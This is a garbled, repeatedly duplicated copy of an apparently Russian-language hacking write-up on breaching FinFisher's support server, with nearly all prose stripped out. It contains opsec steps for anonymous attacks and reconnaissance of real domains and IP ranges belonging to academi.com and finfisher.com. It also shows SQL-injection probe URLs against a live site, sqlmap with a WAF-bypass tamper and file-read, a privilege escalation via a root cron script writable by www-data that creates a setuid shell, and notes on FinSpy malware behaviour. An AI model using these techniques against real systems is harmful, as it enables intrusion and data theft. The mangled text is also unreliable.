https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-
www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-
academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,
fierce.pl
,
fierce.pl -dns
- IP-. , , .
Google . ,
academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,
academiproshop.com
, .
FinFisher
finsupport.finfisher.com
whois-
finfisher.com
, " FinFisher GmbH ".
"FinFisher GmbH" inurl:domaintools
gamma-international.de
,
finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .
fierce
git-,
git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.
fierce
, ,
test.company.com
dev.company.com
, . nikto .
webserver/.svn/
,
webserver/backup/
,
webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (
index.php
, , ).
Scripts/scripts.js.php
Google:
allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:
allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap
--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport .
/BackOffice/
403 Forbidden , SQL- ( ).
print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,
print.php
, . ! MySQL . ,
magicquotes
, MySQL-
INTO OUTFILE
. ,
sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,
unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,
cron
.
webalizer
, , . ,
cron
, ,
cron
.
ls -l /etc/localtime
, 6- ,
webalizer
, , , . , , , - , , . Root- , .
, . , , .
nmap
. nse-
nfs-*
smb-*
. finsupport - -,
qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
